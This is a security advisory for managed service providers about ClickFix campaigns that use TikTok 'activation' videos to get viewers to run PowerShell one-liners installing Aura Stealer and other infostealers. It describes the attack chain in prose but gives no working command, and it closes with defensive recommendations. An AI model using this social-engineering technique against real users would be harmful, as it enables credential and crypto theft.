TikTok “Activation Hacks” Are Luring Users into Running Infostealers

By: Bryson Medlock

A new wave of ClickFix attacks is using TikTok videos to trick users into running PowerShell commands that install info-stealing malware. These campaigns are targeting users looking for free software activations and are spreading rapidly across social media. 

Threat Details 

Cybercriminals are leveraging TikTok’s viral content model to distribute malware through short videos that pose as software activation tutorials. These videos claim to unlock premium features in applications like Windows, Microsoft 365, Adobe Premiere, and even fake services like “Spotify Premium Boost.” The tactic is part of a broader social engineering technique known as ClickFix. 

The attack flow is simple but effective: the video shows a one-liner PowerShell command and instructs viewers to run it as an administrator. The command connects to a remote domain and downloads a secondary script. This script then retrieves two executables, ‘updater.exe’ and ‘source.exe’, from Cloudflare Pages. The first is a variant of the Aura Stealer malware, which exfiltrates browser credentials, cookies, crypto wallets, and app logins. The second payload compiles and injects additional code in memory using .NET’s C# compiler, likely to evade detection and extend functionality. 

What makes this campaign particularly dangerous is its use of trusted platforms and realistic branding. Some videos use AI-generated avatars and polished editing to appear legitimate. The malware executes entirely in memory, bypassing many traditional antivirus solutions. This is not a new technique, ClickFix has been a common initial access technique used in phishing and malvertising campaigns throughout the past year, but TikTok’s reach and engagement make it a potent delivery vector. 

Researchers have also observed variants of this campaign delivering other infostealers like Vidar, StealC, and Latrodectus, depending on the payload source. These strains are capable of harvesting a wide range of sensitive data and are often used in follow-on attacks, including account takeovers and crypto theft. 

The campaign’s success hinges on user interaction. There’s no exploit or vulnerability involve, ƒjust social engineering. This makes it harder to detect and block at the network level, especially in environments where users have local admin rights or where PowerShell logging is not enforced. 

What This Means for MSPs: 

This campaign is a reminder that user behavior, not just technical controls, remains a critical part of the threat landscape. SMB clients are especially vulnerable, as they often lack centralized controls over PowerShell execution and may not have strong user education programs in place. 

MSPs should consider the following actions: 

• Audit and restrict PowerShell usage where possible. 

• Implement endpoint detection that monitors for suspicious script execution and memory injection. 

• Educate end users about the risks of copying commands from social media or unofficial sources. 

• Monitor for credential reuse and encourage clients to adopt MFA across all services. 

This isn’t just a TikTok problem—it’s a visibility and trust problem. As attackers continue to exploit social platforms, MSPs must stay proactive in both technical defenses and user awareness.